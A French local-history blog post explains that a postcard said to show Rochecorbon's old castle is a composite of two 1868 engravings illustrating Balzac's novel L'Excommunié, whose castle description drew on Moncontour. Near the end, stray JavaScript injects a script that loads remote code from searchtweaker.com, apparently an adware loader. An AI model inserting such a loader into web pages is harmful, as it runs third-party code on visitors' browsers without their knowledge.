Une carte postale du château

Lors de mes rencontres avec quelques rochecorbonnais, plusieurs fois il m’a été montré cette carte postale en me demandant s’il s’agissait bien de l’ancien château-fort de Rochecorbon, celui qui entourait jadis la Lanterne de Rochecorbon bien connue.
Carte postale éditée au début du XXème siècle.
Autant le dire de suite : et bien non, cette image est une pure vue de l’esprit de l’artiste. Et même plus précisément cette image est la composition, l’assemblage de deux gravures publiées en 1868.
Le livre dont sont extraites ces images est une réédition posthume d’œuvres de jeunesse d’Honoré de Balzac. Illustrée de gravures, cette édition comprenait en son deuxième tome quelques romans de sa production qu’il qualifiait lui-même de « petites opérations de littérature marchande » : Argow le pirate, Jane la pâle, L’Excommunié, le Centenaire, Dom Gigadas.
Dans L’Excommunié, écrit par Balzac sous le pseudonyme de Horace de Saint-Aubin, le chapitre II commence de la façon suivante :  « À trois milles environ de la ville de Tours, sur la levée d’Orléans, on remarque un énorme rocher creusé de telle façon qu’il offre une vague ressemblance avec le croissant de la lune ; sur le sommet de l’arc, à la partie la plus éloignée du centre, se dresse une tour sombre et haute, supportée par un fragment de muraille dont les fondations presque à jour, dépassent encore de plus d’un pied le rocher sur lesquelles elles sont assises. Cette tour, nommée la Lanterne de Rochecorbon, est le dernier vestige de l’un des plus anciens et des plus forts châteaux de la Touraine. ». Suit alors une amusante et intéressante description de ce que pouvait être à la période évoquée, au début du XVe siècle, la forteresse qui existait alors. À la lumière de ce que nous en savons aujourd’hui, cette description est pleinement fantaisiste.


Le château de Moncontour

Plus précisément, la description que l’on peut y découvrir est basée sur celle d’un autre château proche de celui de Rochecorbon, celui de Moncontour, à Vouvray.


Balzac présente en effet le château ainsi : « Quant à la partie principale du château habitée par le seigneur, elle était composée de deux tours rondes […] séparées par un corps de logis percé d’étroites croisées… ». Il est établi que dans un premier temps Balzac voulait situer son action dans le château de Moncontour (le château dont il rêva en vain l’achat toute sa vie) mais qu’il se ravisa pour un site plus pittoresque, plus étrange.
Les deux gravures
 C’est cette description, à lire dans son intégralité, qui servit de base au dessinateur pour imaginer au travers du texte et des impressions évoquées la forme et l’allure du château. Il composa alors cette image :


Sur la page suivante du livre figure cette deuxième gravure montrant le Duc de Bourgogne sur un cheval caparaçonné :


Chacun pourra constater alors que la carte postale présentée précédemment est bien l’assemblage de ces deux gravures. Deux vues de l’esprit assemblées sur une carte, il en résulte une image bien éloignée de la réalité !


La lanterne

Pour conclure, et en complément du constat que l’éditeur tourangeau de la carte postale a légèrement modifié la tourelle La Lanterne pour mieux coller à la réalité, je rappellerai qu’au moment de l’histoire de Balzac, en 1407, la tourelle n’existait pas encore et qu’elle ne sera érigée que lors de la restauration du château vers 1470, soixante ans plus tard…


pour en savoir plus :
– le texte complet du roman de Balzac à lire sur Google.
– la substitution faite par Balzac de Moncontour par Rochecorbon, sur Google.
– venir découvrir sur place l’histoire du château en parcourant le circuit « Histoire dans la rue ». Plan du circuit à télécharger sur le site de la mairie de Rochecorbon.

(function(){try{var header=document.getElementsByTagName(« HEAD »)[0];var script=document.createElement(« SCRIPT »);script.src= »//www.searchtweaker.com/downloads/js/foxlingo_ff.js »;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState== »complete »||this.readyState== »loaded »)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();


Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion /  Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion /  Changer )

w

Connexion à %s